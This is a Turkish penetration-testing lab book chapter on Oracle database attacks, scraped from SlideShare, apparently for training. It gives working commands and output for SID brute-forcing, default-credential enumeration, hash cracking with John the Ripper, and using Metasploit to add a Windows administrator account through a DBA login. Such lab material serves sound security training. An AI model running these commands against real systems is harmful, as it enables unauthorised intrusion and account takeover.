SlideShare a Scribd company logo
1 of 13
[PENTEST LAB ÇALIŞMALARI]
BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity
PENTEST EĞİTİMİ
UYGULAMA KİTABI
BÖLÜM - 7
[PENTEST LAB ÇALIŞMALARI]
BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity
İÇİNDEKİLER
7.VERİTABANI SIZMA TESTLERİ
BU KATEGORİDEKİ LAB UYGULAMA LİSTESİ
7.1. Ön Tanımlı Sid Değerine Sahip Oracle Veritabanlarının Tespit Edilmesi
7.2. Ön Tanımlı Hesaplardan Kapalı ve Açık Olanların Tespit Edilmesi
7.3. Elde Edilen Parola Özetlerinin Kırılması
7.4. Ele Geçirilen Veritabanı Yöneticisi Hesabı Üzerinden İşletim Sistemini Ele Geçirme
[PENTEST LAB ÇALIŞMALARI]
BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity
7.1. Ön TanımlıSid DeğerineSahip Oracle Veritabanlarının Tespit
Edilmesi
Amaç: Oracle veritabanlarında kullanılan ön tanımlı SID değerlerinin tespit edilmesi.
Araç: Nmap, Metasploit.
Açıklama: SID (System Identifier) değeri her veritabanı için tekdir. Veritabanlarına giriş
için SID değeri kullanılmaktadır. SID değerinin varsayılan olarak bırakılması
saldırganları hedeflerinde bir adım daha yaklaştıran önemli bir açıklıktır.
Uygulama-1(nmap; oracle-sid-brute: parametresiz): Nmap uygulaması ile ön tanımlı
SID değerleri tespit edilecektir. Nmap kendi bünyesinde tanımlı olan tarama biçimlerinin
yanında script (özelleştirilmiş kod blokları) sayesinde daha geniş ve esnek bir tarama
imkânı sunmaktadır. Bu uygulamada kullanılacak olan script “oracle-sid-brute”
scriptidir.
root@bt:~# nmap --script=oracle-sid-brute 192.168.1.23 -p 1521
Starting Nmap 6.01 ( http://nmap.org ) at 2014-08-31 15:49 EEST
Nmap scan report for 192.168.1.23
Host is up (0.00017s latency).
PORT STATE SERVICE
1521/tcp open oracle
| oracle-sid-brute:
|_ ORACLE
MAC Address: 00:0C:29:CC:F9:01 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.06 seconds
Görüldüğü gibi verilen IP adresinde bulunan oracle veritabanında bir adet ön tanımlı
SID değeri bulunabilmiştir. Eğer bu veritabanında bir de kullanıcılar ve parolaları ön
tanımlı olarak bırakıldı ise veritabanı tamamen tehlike altında demektir. Burada nmap
scripti parametresiz olarak kullanılmıştır. Nmap tespit edilen ön tanımlı SID değerlerini
denemektedir, bu değerler ülkeden ülkeye farklılıklar göstermektedir. Bu yüzden
kendinize ait bir SID değeri sözlüğünüzün bulunması testin daha gerçekçi olması
açısından daha önemlidir.
Uygulama-2(nmap; oracle-sid-brute: parametresiz): Nmap uygulamasının
parametreleri değiştirilen scriptler ile birlikte kullanmak daha detaylı ve gerçekçi
taramalar yapılmasını sağlar.
root@bt:~# nmap --script=oracle-sid-brute --script-
args=oraclesids=/root/Desktop/default-sid.txt 192.168.1.23 -p 1521
Starting Nmap 6.01 ( http://nmap.org ) at 2014-08-31 16:17 EEST
[PENTEST LAB ÇALIŞMALARI]
BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity
Nmap scan report for 192.168.1.23
Host is up (0.00027s latency).
PORT STATE SERVICE
1521/tcp open oracle
| oracle-sid-brute:
|_ ORACLE
MAC Address: 00:0C:29:CC:F9:01 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.90 seconds
Görüldüğü üzere yine ön tanımlı SID değeri tespit edilmiş oldu.
Uygulama-3(Metasploit: sid_brute): Metasploit framework içerisinde oracle
veritabanlarına yönelik birçok denetleme modülleri bulunmaktadır. Burada kullanılacak
modülün adı ve dizini:
auxiliary/scanner/oracle/sid_brute. Modül sisteme tanıtıldıktan sonra “show options”
komutu ile program seçenekleri görüntülenir.
msf auxiliary(sid_brute) > show options
Module options (auxiliary/scanner/oracle/sid_brute):
Name Current Setting Required Description
-------- --------------- -----------------------------------------------------------
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
RHOSTS yes The target address range or CIDR
identifier
RPORT 1521 yes The target port
SID no A specific SID to attempt.
SID_FILE /opt/metasploit/msf3/data/wordlists/sid.txt no File containing
instance names, one per line
STOP_ON_SUCCESS false yes Stop guessing when a credential
works for a host
THREADS 1 yes The number of concurrent threads
VERBOSE true yes Whether to print output for all
attempts
Yine bu modülün seçeneklerinde SID listesi varsayılan olarak düzenlenmiştir, fakat
istenildiği durumlarda değiştirilebilir. Yine her modül kullanımında aynı olmak üzere
“Required” sekmesi altında bulunan ve “Yes” olarak işaretlenmiş olan değerler hedef
sisteme göre yeniden girilmesi zorunlu değerlerdir. Gerekli alanlar doldurulduktan sonra
[PENTEST LAB ÇALIŞMALARI]
BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity
modül “run” veya “exploit” komutu ile çalıştırılır. Örnek bir modül çıktısı aşağıda
paylaşılmıştır.
msf auxiliary(sid_brute) > run
[*] Checking 571 SIDs against 192.168.1.23:1521
[+] 192.168.1.23:1521 Oracle - 'ORACLE' is valid
[+] 192.168.1.23:1521 Oracle - 'CLREXTPROC' is valid
[*] Scanned 1 of 3 hosts (033% complete)
[*] Checking 571 SIDs against 192.168.1.24:1521
[-] 192.168.1.24:1521 Oracle - unable to connect to a TNS listener
[*] Scanned 2 of 3 hosts (066% complete)
[*] Checking 571 SIDs against 192.168.1.25:1521
[+] 192.168.1.25:1521 Oracle - 'PLSEXTPROC' is valid
[*] Scanned 3 of 3 hosts (100% complete)
[*] Auxiliary module execution completed
Görüldüğü üzere üç adet ön tanımlı SID değeri bulunmuştur.
[PENTEST LAB ÇALIŞMALARI]
BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity
7.2. Ön TanımlıHesaplardanKapalıve Açık Olanların TespitEdilmesi
Amaç: Kaba kuvvet saldırısı öncesi, sistemde hangi ön tanımlı hesapların açık
hangilerinin kapalı olduğunun tespit edilmesi.
Araç: nmap
Açıklama: Oracle veritabanında SID değerinin tespit edilmesinden sonra sistemde aktif
ön tanımlı kullanıcı hesabının bulunması kaba kuvvet saldırıları için çok önemli bir
adımdır. Sürümden sürüme farklılık göstermekle beraber oracle veritabanındaki
kullanıcılar aşağıda listelenmiştir. Bu hesaplardan aktif olmayanlarını tespit etmek
mümkün.
BI
PM
SH
IX
OE
HR
SCOTT
MGMT_VIEW
MDDATA
SYSMAN
MDSYS
SI_INFORMTN_SCHEMA
ORDPLUGINS
ORDSYS
OLAPSYS
ANONYMOUS
XDB
CTXSYS
EXFSYS
WMSYS
DBSNMP
TSMSYS
DMSYS
DIP
OUTLN
SYSTEM
Uygulama: Bu uygulamada nmap oracle-brute script’i kullanılarak aktif olmayan
hesaplar tespit edilecektir. nmap önceden tespit edilmiş SID değeri için varsayılan
[PENTEST LAB ÇALIŞMALARI]
BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity
kullanıcılara yönelik şifre denemeleri yaparken hesapların aktif yada kapalı olduğunu
öğrenebilir. Bu script 10G sonrası ürünlerde çalışmamaktadır.
root@bt:/usr/share# nmap --script=oracle-brute --script-args oracle-
brute.sid=xporacle 192.168.1.25 -p 1521
Starting Nmap 6.01 ( http://nmap.org ) at 2014-08-31 21:26 EEST
Nmap scan report for 192.168.1.25
Host is up (0.00019s latency).
PORT STATE SERVICE
1521/tcp open oracle
| oracle-brute:
| Accounts
| CTXSYS:CHANGE_ON_INSTALL - Account is locked
| DIP:DIP - Account is locked
| DMSYS:DMSYS - Account is locked
| EXFSYS:EXFSYS - Account is locked
| HR:HR - Account is locked
| MDDATA:MDDATA - Account is locked
| MDSYS:MDSYS - Account is locked
| OLAPSYS:MANAGER - Account is locked
| ORDPLUGINS:ORDPLUGINS - Account is locked
| ORDSYS:ORDSYS - Account is locked
| OUTLN:OUTLN - Account is locked
| SH:SH - Account is locked
| SYSTEM:WELCOME1 - Account is locked
| WMSYS:WMSYS - Account is locked
| XDB:CHANGE_ON_INSTALL - Account is locked
| Statistics
|_ Performed 695 guesses in 8 seconds, average tps: 86
MAC Address: 00:0C:29:C3:3B:62 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 13.00 seconds
Görüldüğü üzere bazı hesapların yanında “Account is locked” ibaresi yer almaktadır. Bu
şekilde aktif olmayan kullanıcılar tespit edilebilir. Dolayısı ile sürüm bilgisinden yola
çıkarak ön tanımlı hesaplardan aktif olmayanlar çıkarılırsa geriye aktif olan hesaplar
kalacaktır.
Örneğin burada sysman, system, scott hesapları aktif.
[PENTEST LAB ÇALIŞMALARI]
BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity
7.3. Elde Edilen Parola Özetlerinin Kırılması
Amaç: Elde edilen parola özetlerin farklı araçlar yardımı ile kırılması.
Araç: Cain, John The Ripper.
Açıklama: Oracle kullanıcılarına ait parolalar sistemde açık bir şekilde tutulmamaktadır.
Parolalar hashleri alınmış bir şekilde sistemde muhafaza edilmektedir. Fakat yine de
parolaların değerlerini elde etmek mümkün. Bu çeşitli araçların yardımı ile
gerçekleştirilebilir. Burada “cain” ve “John The Ripper” araçları kullanılacaktır.
Uygulama-1(Cain): Cain aracı Windows üzerinde çalıştırılabilmektedir. MITM
saldırılarının yanında iyi bir şifre kırıcı olarak kullanılmaktadır. Örnek olarak elde önceki
adımlarda elde edilen hashlerden aşağıdaki kullanılacaktır.
KULLANICI ADI PAROLA HASH DEĞERİ
SYSTEM 2D594E86F93B17A1
Hash bilgisinin girilmesinden parolanın kırılmasına kadar olan adımların ekran
görüntüleri aşağıda verilmiştir.
Programın “Cracker” sekmesinden, “Oracle Hashes” seçilmiştir ve çalışma alanına sağ
tıklanıp parolanın hash değeri manuel olarak girilmektedir.
[PENTEST LAB ÇALIŞMALARI]
BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity
Parolanın manuel olarak girilmesine ait ekran görüntüsü:
Eklenen parolanın kırılma biçiminin seçilmesi.
Parolanın kırıldığını gösteren ekran görüntüsü:
[PENTEST LAB ÇALIŞMALARI]
BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity
John The Ripper ile: John The Ripper uygulaması çok başarılı ve başka programlar
ile uyumlu çalışabilen bir programdır. Parola tanıma ve kırma noktasında en başarılı
yazılımdır denilebilir. John’un parolaları kırabilmesi için parola dosyasının belirli bir
formatta olması gerekmektedir.
Oracle 11 öncesi için;
Kabul Edilebilen Kullanıcı Adı- Hash Değerleri
O$SIMON#4F8BC1809CB2AF77
username:O$SIMON#4F8BC1809CB2AF77
username:O$SIMON#4F8BC1809CB2AF77:::::::
Oracle 11 ve sonrası için;
Kabul Edilebilen Kullanıcı Adı- Hash Değerleri
5FDAB69F543563582BA57894FE1C1361FB8ED57B903603F2C52ED1B4D642
username:5FDAB69F543563582BA57894FE1C1361FB8ED57B903603F2C52ED1B4
D642
username:5FDAB69F543563582BA57894FE1C1361FB8ED57B903603F2C52ED1B4
D642:::::::
Parolaların “hashes.txt” adında bir dosyada, yukarıdaki metotlardan biri kullanılarak
tutulduğu varsayılmaktadır. Bu düzende kullanılabilecek John komutları;
john hashes.txt
john --format=oracle hashes.txt
john --format=oracle11 hashes.txt
Parolanın kırıldığı program çıktısı: (parola kırmızı renkte gösterilmiştir.)
root@kali:~/Desktop# john --wordlist=/usr/share/wordlists/rockyou.txt --
format=oracle hashes.txt
Loaded 2 password hashes with 2 different salts (Oracle 10 DES [32/64])
Remaining 1 password hash
ORACLE (?)
guesses: 1 time: 0:00:00:00 DONE (Thu Sep 4 18:05:51 2014) c/s: 638850
trying: ORACLE
[PENTEST LAB ÇALIŞMALARI]
BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity
7.4. Ele Geçirilen Veritabanı YöneticisiHesabıÜzerindenİşletim
SisteminiEle Geçirme
Amaç: Ele geçirilen veritabanı yöneticisi hesabının kullanılarak, oracle veritabanının
üzerinde bulunduğu işletim sistemini ele geçirmek.
Araç: Metasploit
Açıklama: Oracle veritabanında bulunan yetkili kullanıcıların dolaylı olarak işletim
sistemi üzerinde komut çalıştırma hakları vardır. Bunun yapılabilmesi için bazı java
sınıflarının oluşturulması ve yönetici hesabı yetkileri ile çalıştırılması gerekmektedir. Bu
komutlar SYSTEM hakları ile çalıştırıldığından sisteme kullanıcı ekleme, sistemde bir
servisin başlatılması gibi çok önemli işlemlerin yapılasına olanak sağlamaktadır. Bu iş
için özelleştirilmiş Metasploit modülleri bulunmaktadır. win32exec modülü java
sınıflarını kullanarak işletim sisteminde komut çalıştırabilmektedir. Bu modülün açık adı
ve dizini auxiliary/admin/oracle/post_exploitation/win32exec’dir.
Uygulama: “use auxiliary/admin/oracle/post_exploitation/win32exec” komutu ile
modül sisteme tanıtılır. “show options” komutu ile doldurulması gerekli alanlar belirlenir
ve doldurulur. Modülün sisteme tanıtılması ve gerekli parametrelerin tespit edilmesi
aşğıda verilmiştir.
msf > use auxiliary/admin/oracle/post_exploitation/win32exec
msf auxiliary(win32exec) > show options
Module options (auxiliary/admin/oracle/post_exploitation/win32exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD ipconfig no The OS command to
execute.
DBPASS TIGER yes The password to
authenticate with.
DBUSER SCOTT yes The username to
authenticate with.
RHOST yes The Oracle host.
RPORT 1521 yes The TNS port.
SID ORCL yes The sid to authenticate
with.
Sisteme yeni bir kullanıcı eklemek için gerekli düzenlemelerin yapılmış hali aşağıda
verilmiştir.
msf auxiliary(win32exec) > show options
[PENTEST LAB ÇALIŞMALARI]
BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity
Module options (auxiliary/admin/oracle/post_exploitation/win32exec):
Name Current Setting Required Description
---- --------------- -------- -----------
CMD net user bga bga /add no The OS command to execute.
DBPASS oracle yes The password to authenticate with.
DBUSER system yes The username to authenticate with.
RHOST 192.168.1.25 yes The Oracle host.
RPORT 1521 yes The TNS port.
SID xporacle yes The sid to authenticate with.
Sisteme bga adında bir kullanıcı eklendiğini göstermek adına, aşağıda hedef sistem
üzerinde mevcut kullanıcılar listelenmiştir.
Sisteme eklenen kulacının, Windows sistemlerde en yetkili kullanıcı grubu olan
“administrators” grubuna eklemek için gerekli düzenlemelerin yapılmış hali aşağıda
verilmiştir.
msf auxiliary(win32exec) > show options
Module options (auxiliary/admin/oracle/post_exploitation/win32exec):
Name Current Setting Required Description
---- --------------- -------- -------------------------
CMD net localgroup administrators bga /add no The OS command to
execute.
DBPASS oracle yes The password to authenticate
with.
DBUSER system yes The username to authenticate
with.
RHOST 192.168.1.25 yes The Oracle host.
RPORT 1521 yes The TNS port.
SID xporacle yes The sid to authenticate with.
[PENTEST LAB ÇALIŞMALARI]
BGA Bilgi Güvenliğ i A.Ş . | www.bga.com.tr | @bgasecurity
Modülün bu düzenlemeler ile çalıştırılmış halinin çıktısı aşağıda verilmiştir.
msf auxiliary(win32exec) > run
[*] Creating java source 'SCJ'...
[*] CREATE successful
[*] Creating procedure 'TLJ'...
[*] CREATE successful
[*] Sending command: 'net localgroup administrators bga /add'
[*] Removing java source 'SCJ'...
[*] DROP successful
[*] Removing procedure 'TLJ'...
[*] DROP successful
[*] Auxiliary module execution completed
“bga” adındaki kullanıcının sisteme administrators grubuna eklendğini göstermek adına,
administrators grubuna dahil olan kullanıcılar aşağıda listelenmiştir.
Böylece oracle veritabanı açıklığı kullanılarak işletim sistemi ele geçirilmiş oldu.
Not: Bu doküman BGA Bilgi Güvenliği A.Ş için Mesut Türk tarafından hazırlanmıştır.

More Related Content

What's hot

GÜVENLİK SİSTEMLERİNİ ATLATMA
GÜVENLİK SİSTEMLERİNİ ATLATMAGÜVENLİK SİSTEMLERİNİ ATLATMA
GÜVENLİK SİSTEMLERİNİ ATLATMABGA Cyber Security
 
Hacklenmiş Windows Sistem Analizi
Hacklenmiş Windows Sistem AnaliziHacklenmiş Windows Sistem Analizi
Hacklenmiş Windows Sistem AnaliziBGA Cyber Security
 
Uygulamalı Ağ Güvenliği Eğitim Notları
Uygulamalı Ağ Güvenliği Eğitim NotlarıUygulamalı Ağ Güvenliği Eğitim Notları
Uygulamalı Ağ Güvenliği Eğitim NotlarıBGA Cyber Security
 
Zararlı Yazılım Analizi Eğitimi Lab Kitabı
Zararlı Yazılım Analizi Eğitimi Lab KitabıZararlı Yazılım Analizi Eğitimi Lab Kitabı
Zararlı Yazılım Analizi Eğitimi Lab KitabıBGA Cyber Security
 
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ BGA Cyber Security
 
Beyaz Şapkalı Hacker (CEH) Lab Kitabı
Beyaz Şapkalı Hacker (CEH) Lab KitabıBeyaz Şapkalı Hacker (CEH) Lab Kitabı
Beyaz Şapkalı Hacker (CEH) Lab KitabıBGA Cyber Security
 
Nmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım KılavuzuNmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım KılavuzuMehmet Caner Köroğlu
 
SIZMA TESTLERİNDE BİLGİ TOPLAMA
SIZMA TESTLERİNDE BİLGİ TOPLAMASIZMA TESTLERİNDE BİLGİ TOPLAMA
SIZMA TESTLERİNDE BİLGİ TOPLAMABGA Cyber Security
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3BGA Cyber Security
 
Yerel Ağda Gerçekleştirilebilecek Sadırılar ve Türleri
Yerel Ağda Gerçekleştirilebilecek Sadırılar ve Türleri Yerel Ağda Gerçekleştirilebilecek Sadırılar ve Türleri
Yerel Ağda Gerçekleştirilebilecek Sadırılar ve Türleri BGA Cyber Security
 
WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ BGA Cyber Security
 

What's hot (20)

PAROLA KIRMA SALDIRILARI
PAROLA KIRMA SALDIRILARIPAROLA KIRMA SALDIRILARI
PAROLA KIRMA SALDIRILARI
 
BackTrack Linux-101 Eğitimi
BackTrack Linux-101 EğitimiBackTrack Linux-101 Eğitimi
BackTrack Linux-101 Eğitimi
 
GÜVENLİK SİSTEMLERİNİ ATLATMA
GÜVENLİK SİSTEMLERİNİ ATLATMAGÜVENLİK SİSTEMLERİNİ ATLATMA
GÜVENLİK SİSTEMLERİNİ ATLATMA
 
Metasploit El Kitabı
Metasploit El KitabıMetasploit El Kitabı
Metasploit El Kitabı
 
Hacklenmiş Windows Sistem Analizi
Hacklenmiş Windows Sistem AnaliziHacklenmiş Windows Sistem Analizi
Hacklenmiş Windows Sistem Analizi
 
10 Adımda Sızma Testleri
10 Adımda Sızma Testleri10 Adımda Sızma Testleri
10 Adımda Sızma Testleri
 
Metasploit Framework Eğitimi
Metasploit Framework EğitimiMetasploit Framework Eğitimi
Metasploit Framework Eğitimi
 
Uygulamalı Ağ Güvenliği Eğitim Notları
Uygulamalı Ağ Güvenliği Eğitim NotlarıUygulamalı Ağ Güvenliği Eğitim Notları
Uygulamalı Ağ Güvenliği Eğitim Notları
 
Zararlı Yazılım Analizi Eğitimi Lab Kitabı
Zararlı Yazılım Analizi Eğitimi Lab KitabıZararlı Yazılım Analizi Eğitimi Lab Kitabı
Zararlı Yazılım Analizi Eğitimi Lab Kitabı
 
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ
 
Beyaz Şapkalı Hacker (CEH) Lab Kitabı
Beyaz Şapkalı Hacker (CEH) Lab KitabıBeyaz Şapkalı Hacker (CEH) Lab Kitabı
Beyaz Şapkalı Hacker (CEH) Lab Kitabı
 
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 1
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 1Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 1
Uygulamali Sizma Testi (Pentest) Egitimi Sunumu - 1
 
Web uygulama açıklıklarından faydalanarak sistem ele geçirme
Web uygulama açıklıklarından faydalanarak sistem ele geçirmeWeb uygulama açıklıklarından faydalanarak sistem ele geçirme
Web uygulama açıklıklarından faydalanarak sistem ele geçirme
 
Nmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım KılavuzuNmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
Nmap101 Eğitim Sunumu - Nmap Kullanım Kılavuzu
 
SIZMA TESTLERİNDE BİLGİ TOPLAMA
SIZMA TESTLERİNDE BİLGİ TOPLAMASIZMA TESTLERİNDE BİLGİ TOPLAMA
SIZMA TESTLERİNDE BİLGİ TOPLAMA
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 1, 2, 3
 
Yerel Ağda Gerçekleştirilebilecek Sadırılar ve Türleri
Yerel Ağda Gerçekleştirilebilecek Sadırılar ve Türleri Yerel Ağda Gerçekleştirilebilecek Sadırılar ve Türleri
Yerel Ağda Gerçekleştirilebilecek Sadırılar ve Türleri
 
BTRİSK Web Uygulama Güvenliği Denetimi Eğitim Sunumu
BTRİSK Web Uygulama Güvenliği Denetimi Eğitim SunumuBTRİSK Web Uygulama Güvenliği Denetimi Eğitim Sunumu
BTRİSK Web Uygulama Güvenliği Denetimi Eğitim Sunumu
 
Kablosuz Ağlarda Adli Analiz
Kablosuz Ağlarda Adli AnalizKablosuz Ağlarda Adli Analiz
Kablosuz Ağlarda Adli Analiz
 
WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ
 

Viewers also liked

INTERNET VE YEREL AĞ SIZMA TESTLERİ
INTERNET VE YEREL AĞ SIZMA TESTLERİ INTERNET VE YEREL AĞ SIZMA TESTLERİ
INTERNET VE YEREL AĞ SIZMA TESTLERİ BGA Cyber Security
 
Ruby Programlama Dili
Ruby Programlama DiliRuby Programlama Dili
Ruby Programlama Dilipinguar
 
Internet Tabanli EğItim
Internet Tabanli EğItimInternet Tabanli EğItim
Internet Tabanli EğItimselver
 
Özgür Yazılımlarla Görüntü İşleme
Özgür Yazılımlarla Görüntü İşlemeÖzgür Yazılımlarla Görüntü İşleme
Özgür Yazılımlarla Görüntü İşlemeEnes Ateş
 
AI - Tekil 12 GSÜ
AI - Tekil 12 GSÜAI - Tekil 12 GSÜ
AI - Tekil 12 GSÜBurak Evren
 
HTTPS Ne Kadar Güvenlidir?(sslstrip)
HTTPS Ne Kadar Güvenlidir?(sslstrip)HTTPS Ne Kadar Güvenlidir?(sslstrip)
HTTPS Ne Kadar Güvenlidir?(sslstrip)BGA Cyber Security
 
Büyük Veri ve Risk Yönetimi
Büyük Veri ve Risk YönetimiBüyük Veri ve Risk Yönetimi
Büyük Veri ve Risk YönetimiFatma ÇINAR
 
Liselere Yazılım ve Siber Güvenlik Farkındalığı Sunumu
Liselere Yazılım ve Siber Güvenlik Farkındalığı SunumuLiselere Yazılım ve Siber Güvenlik Farkındalığı Sunumu
Liselere Yazılım ve Siber Güvenlik Farkındalığı SunumuAhmet Gürel
 
Ruby - Dünyanın En Güzel Programlama Dili
Ruby - Dünyanın En Güzel Programlama DiliRuby - Dünyanın En Güzel Programlama Dili
Ruby - Dünyanın En Güzel Programlama DiliSerdar Dogruyol
 
Görüntü işleme - Image Processing
Görüntü işleme - Image ProcessingGörüntü işleme - Image Processing
Görüntü işleme - Image Processingİbrahim Bayraktar
 
Büyük veri(bigdata)
Büyük veri(bigdata)Büyük veri(bigdata)
Büyük veri(bigdata)Hülya Soylu
 
10-Kablosuz Ağlardaki Zaafiyetler
10-Kablosuz Ağlardaki Zaafiyetler10-Kablosuz Ağlardaki Zaafiyetler
10-Kablosuz Ağlardaki ZaafiyetlerÖnay Kıvılcım
 
Open cv kütüphanesi
Open cv kütüphanesiOpen cv kütüphanesi
Open cv kütüphanesiahmetkakici
 
Python Programlama Dili Eğitimi
Python Programlama Dili EğitimiPython Programlama Dili Eğitimi
Python Programlama Dili EğitimiEnes Ateş
 
Tcpdump ile Trafik Analizi(Sniffing)
Tcpdump ile Trafik Analizi(Sniffing)Tcpdump ile Trafik Analizi(Sniffing)
Tcpdump ile Trafik Analizi(Sniffing)BGA Cyber Security
 

Viewers also liked (20)

INTERNET VE YEREL AĞ SIZMA TESTLERİ
INTERNET VE YEREL AĞ SIZMA TESTLERİ INTERNET VE YEREL AĞ SIZMA TESTLERİ
INTERNET VE YEREL AĞ SIZMA TESTLERİ
 
DOS DDOS TESTLERİ
DOS DDOS TESTLERİ DOS DDOS TESTLERİ
DOS DDOS TESTLERİ
 
Ruby Programlama Dili
Ruby Programlama DiliRuby Programlama Dili
Ruby Programlama Dili
 
Internet Tabanli EğItim
Internet Tabanli EğItimInternet Tabanli EğItim
Internet Tabanli EğItim
 
Özgür Yazılımlarla Görüntü İşleme
Özgür Yazılımlarla Görüntü İşlemeÖzgür Yazılımlarla Görüntü İşleme
Özgür Yazılımlarla Görüntü İşleme
 
Yapay Zeka
Yapay ZekaYapay Zeka
Yapay Zeka
 
AI - Tekil 12 GSÜ
AI - Tekil 12 GSÜAI - Tekil 12 GSÜ
AI - Tekil 12 GSÜ
 
HTTPS Ne Kadar Güvenlidir?(sslstrip)
HTTPS Ne Kadar Güvenlidir?(sslstrip)HTTPS Ne Kadar Güvenlidir?(sslstrip)
HTTPS Ne Kadar Güvenlidir?(sslstrip)
 
Büyük Veri ve Risk Yönetimi
Büyük Veri ve Risk YönetimiBüyük Veri ve Risk Yönetimi
Büyük Veri ve Risk Yönetimi
 
Liselere Yazılım ve Siber Güvenlik Farkındalığı Sunumu
Liselere Yazılım ve Siber Güvenlik Farkındalığı SunumuLiselere Yazılım ve Siber Güvenlik Farkındalığı Sunumu
Liselere Yazılım ve Siber Güvenlik Farkındalığı Sunumu
 
EXPLOIT POST EXPLOITATION
EXPLOIT POST EXPLOITATIONEXPLOIT POST EXPLOITATION
EXPLOIT POST EXPLOITATION
 
Ruby - Dünyanın En Güzel Programlama Dili
Ruby - Dünyanın En Güzel Programlama DiliRuby - Dünyanın En Güzel Programlama Dili
Ruby - Dünyanın En Güzel Programlama Dili
 
Görüntü işleme - Image Processing
Görüntü işleme - Image ProcessingGörüntü işleme - Image Processing
Görüntü işleme - Image Processing
 
Büyük veri(bigdata)
Büyük veri(bigdata)Büyük veri(bigdata)
Büyük veri(bigdata)
 
10-Kablosuz Ağlardaki Zaafiyetler
10-Kablosuz Ağlardaki Zaafiyetler10-Kablosuz Ağlardaki Zaafiyetler
10-Kablosuz Ağlardaki Zaafiyetler
 
Open cv kütüphanesi
Open cv kütüphanesiOpen cv kütüphanesi
Open cv kütüphanesi
 
Python Programlama Dili Eğitimi
Python Programlama Dili EğitimiPython Programlama Dili Eğitimi
Python Programlama Dili Eğitimi
 
Tcpdump ile Trafik Analizi(Sniffing)
Tcpdump ile Trafik Analizi(Sniffing)Tcpdump ile Trafik Analizi(Sniffing)
Tcpdump ile Trafik Analizi(Sniffing)
 
Yapay Sinir Ağları
Yapay Sinir AğlarıYapay Sinir Ağları
Yapay Sinir Ağları
 
Yapay Sinir Ağları
Yapay Sinir AğlarıYapay Sinir Ağları
Yapay Sinir Ağları
 

Similar to VERİTABANI SIZMA TESTLERİ

MICROSOFT SQL SERVER SIZMA VE GÜVENLİK TESTİ ÇALIŞMALARI
MICROSOFT SQL SERVER SIZMA VE GÜVENLİK TESTİ ÇALIŞMALARIMICROSOFT SQL SERVER SIZMA VE GÜVENLİK TESTİ ÇALIŞMALARI
MICROSOFT SQL SERVER SIZMA VE GÜVENLİK TESTİ ÇALIŞMALARIBGA Cyber Security
 
Veritabanı Sızma Testleri - Keşif
Veritabanı Sızma Testleri - KeşifVeritabanı Sızma Testleri - Keşif
Veritabanı Sızma Testleri - KeşifFerhat Ozgur Catak
 
Oracle Golden Gate
Oracle Golden GateOracle Golden Gate
Oracle Golden GateAnar Godjaev
 
Log yonetimi tecrubeleri
Log yonetimi tecrubeleriLog yonetimi tecrubeleri
Log yonetimi tecrubeleriErtugrul Akbas
 
WAF atlatma yontemleri, Hacktrick14, Suleyman Ozarslan
WAF atlatma yontemleri, Hacktrick14,  Suleyman OzarslanWAF atlatma yontemleri, Hacktrick14,  Suleyman Ozarslan
WAF atlatma yontemleri, Hacktrick14, Suleyman OzarslanSüleyman Özarslan
 
Log Yönetimi ve Saldırı Analizi Eğitimi - 2
Log Yönetimi ve Saldırı Analizi Eğitimi - 2Log Yönetimi ve Saldırı Analizi Eğitimi - 2
Log Yönetimi ve Saldırı Analizi Eğitimi - 2BGA Cyber Security
 
